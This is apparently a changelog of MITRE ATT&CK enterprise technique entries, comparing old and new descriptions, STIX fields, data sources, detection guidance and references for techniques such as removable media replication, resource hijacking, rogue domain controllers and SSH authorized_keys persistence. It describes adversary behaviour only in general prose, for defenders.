dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-02-25 19:23:34.204000+00:002022-03-28 16:07:44.605000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
x_mitre_data_sources[1]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation
x_mitre_version1.01.1

[T1091] Replication Through Removable Media

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may move onto systems, possibly those on disconnt1Adversaries may move onto systems, possibly those on disconn
>ected or air-gapped networks, by copying malware to removabl>ected or air-gapped networks, by copying malware to removabl
>e media and taking advantage of Autorun features when the me>e media and taking advantage of Autorun features when the me
>dia is inserted into a system and executes. In the case of L>dia is inserted into a system and executes. In the case of L
>ateral Movement, this may occur through modification of exec>ateral Movement, this may occur through modification of exec
>utable files stored on removable media or by copying malware>utable files stored on removable media or by copying malware
> and renaming it to look like a legitimate file to trick use> and renaming it to look like a legitimate file to trick use
>rs into executing it on a separate system. In the case of In>rs into executing it on a separate system. In the case of In
>itial Access, this may occur through manual manipulation of >itial Access, this may occur through manual manipulation of 
>the media, modification of systems used to initially format >the media, modification of systems used to initially format 
>the media, or modification to the media's firmware itself.>the media, or modification to the media's firmware itself.  
 >Mobile devices may also be used to infect PCs with malware i
 >f connected via USB.(Citation: Exploiting Smartphone USB ) T
 >his infection may be achieved using devices (Android, iOS, e
 >tc.) and, in some instances, USB charging cables.(Citation: 
 >Windows Malware Infecting Android)(Citation: iPhone Charging
 > Cable Hack) For example, when a smartphone is connected to 
 >a system, it may appear to be mounted similar to a USB-conne
 >cted disk drive. If malware that is compatible with the conn
 >ected system is on the mobile device, the malware could infe
 >ct the machine (especially if Autorun features are enabled).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Joas Antonio dos Santos, @Cr4zyC0d3']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-20 02:18:04.581000+00:002022-10-21 19:14:13.179000+00:00
descriptionAdversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).
x_mitre_data_sources[0]Process: Process CreationDrive: Drive Creation
x_mitre_data_sources[2]File: File CreationProcess: Process Creation
x_mitre_data_sources[3]Drive: Drive CreationFile: File Creation
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Windows Malware Infecting Android', 'description': 'Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.', 'url': 'https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html'}
external_references{'source_name': 'iPhone Charging Cable Hack', 'description': 'Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.', 'url': 'https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/'}
external_references{'source_name': 'Exploiting Smartphone USB ', 'description': 'Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.', 'url': 'https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf'}

[T1496] Resource Hijacking

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may leverage the resources of co-opted systems it1Adversaries may leverage the resources of co-opted systems i
>n order to solve resource intensive problems which may impac>n order to solve resource intensive problems, which may impa
>t system and/or hosted service availability.   One common pu>ct system and/or hosted service availability.   One common p
>rpose for Resource Hijacking is to validate transactions of >urpose for Resource Hijacking is to validate transactions of
>cryptocurrency networks and earn virtual currency. Adversari> cryptocurrency networks and earn virtual currency. Adversar
>es may consume enough system resources to negatively impact >ies may consume enough system resources to negatively impact
>and/or cause affected machines to become unresponsive.(Citat> and/or cause affected machines to become unresponsive.(Cita
>ion: Kaspersky Lazarus Under The Hood Blog 2017) Servers and>tion: Kaspersky Lazarus Under The Hood Blog 2017) Servers an
> cloud-based(Citation: CloudSploit - Unused AWS Regions) sys>d cloud-based systems are common targets because of the high
>tems are common targets because of the high potential for av> potential for available resources, but user endpoint system
>ailable resources, but user endpoint systems may also be com>s may also be compromised and used for Resource Hijacking an
>promised and used for Resource Hijacking and cryptocurrency >d cryptocurrency mining.(Citation: CloudSploit - Unused AWS 
>mining. Containerized environments may also be targeted due >Regions) Containerized environments may also be targeted due
>to the ease of deployment via exposed APIs and the potential> to the ease of deployment via exposed APIs and the potentia
> for scaling mining activities by deploying or compromising >l for scaling mining activities by deploying or compromising
>multiple containers within an environment or cluster.(Citati> multiple containers within an environment or cluster.(Citat
>on: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed>ion: Unit 42 Hildegard Malware)(Citation: Trend Micro Expose
> Docker APIs)  Additionally, some cryptocurrency mining malw>d Docker APIs)  Additionally, some cryptocurrency mining mal
>are kills off processes for competing malware to ensure it’s>ware identify then kill off processes for competing malware 
> not competing for resources.(Citation: Trend Micro War of C>to ensure it’s not competing for resources.(Citation: Trend 
>rypto Miners)>Micro War of Crypto Miners)  Adversaries may also use malwar
 >e that leverages a system's network bandwidth as part of a b
 >otnet in order to facilitate [Network Denial of Service](htt
 >ps://attack.mitre.org/techniques/T1498) campaigns and/or to 
 >seed malicious torrents.(Citation: GoBotKR)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:06:32.187000+00:002022-04-18 20:16:44.560000+00:00
descriptionAdversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR)
external_references[1]['source_name']Kaspersky Lazarus Under The Hood Blog 2017Unit 42 Hildegard Malware
external_references[1]['description']GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
external_references[1]['url']https://securelist.com/lazarus-under-the-hood/77908/https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
external_references[3]['source_name']Unit 42 Hildegard MalwareKaspersky Lazarus Under The Hood Blog 2017
external_references[3]['description']Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.
external_references[3]['url']https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/https://securelist.com/lazarus-under-the-hood/77908/
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GoBotKR', 'description': 'Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.', 'url': 'https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/'}
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesFile: File Creation

[T1207] Rogue Domain Controller

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:13:27.670000+00:002022-03-08 21:20:04.850000+00:00
x_mitre_detectionMonitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.
x_mitre_version2.02.1

[T1565.003] Data Manipulation: Runtime Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify systems in order to manipulate the dat1Adversaries may modify systems in order to manipulate the da
>ta as it is accessed and displayed to an end user.(Citation:>ta as it is accessed and displayed to an end user, thus thre
> FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By>atening the integrity of the data.(Citation: FireEye APT38 O
> manipulating runtime data, adversaries may attempt to affec>ct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating ru
>t a business process, organizational understanding, and deci>ntime data, adversaries may attempt to affect a business pro
>sion making.  Adversaries may alter application binaries use>cess, organizational understanding, and decision making.  Ad
>d to display data in order to cause runtime manipulations. A>versaries may alter application binaries used to display dat
>dversaries may also conduct [Change Default File Association>a in order to cause runtime manipulations. Adversaries may a
>](https://attack.mitre.org/techniques/T1546/001) and [Masque>lso conduct [Change Default File Association](https://attack
>rading](https://attack.mitre.org/techniques/T1036) to cause >.mitre.org/techniques/T1546/001) and [Masquerading](https://
>a similar effect. The type of modification and the impact it>attack.mitre.org/techniques/T1036) to cause a similar effect
> will have depends on the target application and process as >. The type of modification and the impact it will have depen
>well as the goals and objectives of the adversary. For compl>ds on the target application and process as well as the goal
>ex systems, an adversary would likely need special expertise>s and objectives of the adversary. For complex systems, an a
> and possibly access to specialized software related to the >dversary would likely need special expertise and possibly ac
>system that would typically be gained through a prolonged in>cess to specialized software related to the system that woul
>formation gathering campaign in order to have the desired im>d typically be gained through a prolonged information gather
>pact.>ing campaign in order to have the desired impact.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 23:10:34.359000+00:002022-03-25 19:24:18.545000+00:00
descriptionAdversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
x_mitre_data_sources[0]Process: OS API ExecutionFile: File Metadata
x_mitre_data_sources[3]File: File MetadataFile: File Creation
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1098.004] Account Manipulation: SSH Authorized Keys

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify the SSH <code>authorized_keys</code> t1Adversaries may modify the SSH <code>authorized_keys</code> 
>file to maintain persistence on a victim host. Linux distrib>file to maintain persistence on a victim host. Linux distrib
>utions and macOS commonly use key-based authentication to se>utions and macOS commonly use key-based authentication to se
>cure the authentication process of SSH sessions for remote m>cure the authentication process of SSH sessions for remote m
>anagement. The <code>authorized_keys</code> file in SSH spec>anagement. The <code>authorized_keys</code> file in SSH spec
>ifies the SSH keys that can be used for logging into the use>ifies the SSH keys that can be used for logging into the use
>r account for which the file is configured. This file is usu>r account for which the file is configured. This file is usu
>ally found in the user's home directory under <code>&lt;user>ally found in the user's home directory under <code>&lt;user
>-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authori>-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authori
>zed Keys) Users may edit the system’s SSH config file to mod>zed Keys) Users may edit the system’s SSH config file to mod
>ify the directives PubkeyAuthentication and RSAAuthenticatio>ify the directives PubkeyAuthentication and RSAAuthenticatio
>n to the value “yes” to ensure public key and RSA authentica>n to the value “yes” to ensure public key and RSA authentica
>tion are enabled. The SSH config file is usually located und>tion are enabled. The SSH config file is usually located und
>er <code>/etc/ssh/sshd_config</code>.  Adversaries may modif>er <code>/etc/ssh/sshd_config</code>.  Adversaries may modif
>y SSH <code>authorized_keys</code> files directly with scrip>y SSH <code>authorized_keys</code> files directly with scrip
>ts or shell commands to add their own adversary-supplied pub>ts or shell commands to add their own adversary-supplied pub
>lic keys. This ensures that an adversary possessing the corr>lic keys. In cloud environments, adversaries may be able to 
>esponding private key may log in as an existing user via SSH>modify the SSH authorized_keys file of a particular virtual 
>.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linu>machine via the command line interface or rest API. For exam
>x Exim Worm)>ple, by using the Google Cloud CLI’s “add-metadata” command 
 >an adversary may add SSH keys to a user account.(Citation: G
 >oogle Cloud Add Metadata)(Citation: Google Cloud Privilege E
 >scalation) Similarly, in Azure, an adversary may update the 
 >authorized_keys file of a virtual machine via a PATCH reques
 >t to the API.(Citation: Azure Update Virtual Machines) This 
 >ensures that an adversary possessing the corresponding priva
 >te key may log in as an existing user via SSH.(Citation: Ven
 >afi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)  Wh
 >ere authorized_keys files are modified via cloud APIs or com
 >mand line interfaces, an adversary may achieve privilege esc
 >alation on the target virtual machine if they add a key to a
 > higher-privileged user. 

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-06-25 16:32:23.367000+00:002022-04-20 16:26:57.982000+00:00
descriptionAdversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.
external_references[1]['source_name']SSH Authorized KeysVenafi SSH Key Abuse
external_references[1]['description']ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.
external_references[1]['url']https://www.ssh.com/ssh/authorized_keys/https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities
external_references[2]['source_name']Venafi SSH Key AbuseGoogle Cloud Privilege Escalation
external_references[2]['description']Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.
external_references[2]['url']https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilitieshttps://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/
x_mitre_detectionUse file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Google Cloud Add Metadata', 'description': 'Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata'}
external_references{'source_name': 'Azure Update Virtual Machines', 'description': 'Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update'}
external_references{'source_name': 'SSH Authorized Keys', 'description': 'ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.', 'url': 'https://www.ssh.com/ssh/authorized_keys/'}
x_mitre_contributorsDror Alon, Palo Alto Networks
x_mitre_contributorsOr Kliger, Palo Alto Networks
x_mitre_data_sourcesFile: File Modification
x_mitre_platformsIaaS
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

[T1053] Scheduled Task/Job

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may abuse task scheduling functionality to facilt1Adversaries may abuse task scheduling functionality to facil
>itate initial or recurring execution of malicious code. Util>itate initial or recurring execution of malicious code. Util
>ities exist within all major operating systems to schedule p>ities exist within all major operating systems to schedule p
>rograms or scripts to be executed at a specified date and ti>rograms or scripts to be executed at a specified date and ti
>me. A task can also be scheduled on a remote system, provide>me. A task can also be scheduled on a remote system, provide
>d the proper authentication is met (ex: RPC and file and pri>d the proper authentication is met (ex: RPC and file and pri
>nter sharing in Windows environments). Scheduling a task on >nter sharing in Windows environments). Scheduling a task on 
>a remote system typically requires being a member of an admi>a remote system typically may require being a member of an a
>n or otherwise privileged group on the remote system.(Citati>dmin or otherwise privileged group on the remote system.(Cit
>on: TechNet Task Scheduler Security)  Adversaries may use ta>ation: TechNet Task Scheduler Security)  Adversaries may use
>sk scheduling to execute programs at system startup or on a > task scheduling to execute programs at system startup or on
>scheduled basis for persistence. These mechanisms can also b> a scheduled basis for persistence. These mechanisms can als
>e abused to run a process under the context of a specified a>o be abused to run a process under the context of a specifie
>ccount (such as one with elevated permissions/privileges).>d account (such as one with elevated permissions/privileges)
 >. Similar to [System Binary Proxy Execution](https://attack.
 >mitre.org/techniques/T1218), adversaries have also abused ta
 >sk scheduling to potentially mask one-time execution under a
 > trusted system process.(Citation: ProofPoint Serpent)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCampbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-557
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:36:26.445000+00:002022-04-14 20:59:52.686000+00:00
descriptionAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
external_references[1]['source_name']capecProofPoint Serpent
external_references[1]['url']https://capec.mitre.org/data/definitions/557.htmlhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
x_mitre_data_sources[0]File: File CreationCommand: Command Execution
x_mitre_data_sources[1]Container: Container CreationFile: File Creation
x_mitre_data_sources[2]Scheduled Job: Scheduled Job CreationFile: File Modification
x_mitre_data_sources[3]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[4]File: File ModificationContainer: Container Creation
x_mitre_data_sources[5]Process: Process CreationScheduled Job: Scheduled Job Creation
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/557.html', 'external_id': 'CAPEC-557'}
x_mitre_contributorsAndrew Northern, @ex_raritas
x_mitre_contributorsBryan Campbell, @bry_campbell
x_mitre_contributorsZachary Abzug, @ZackDoesML
x_mitre_contributorsSelena Larson, @selenalarson

[T1593] Search Open Websites/Domains

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
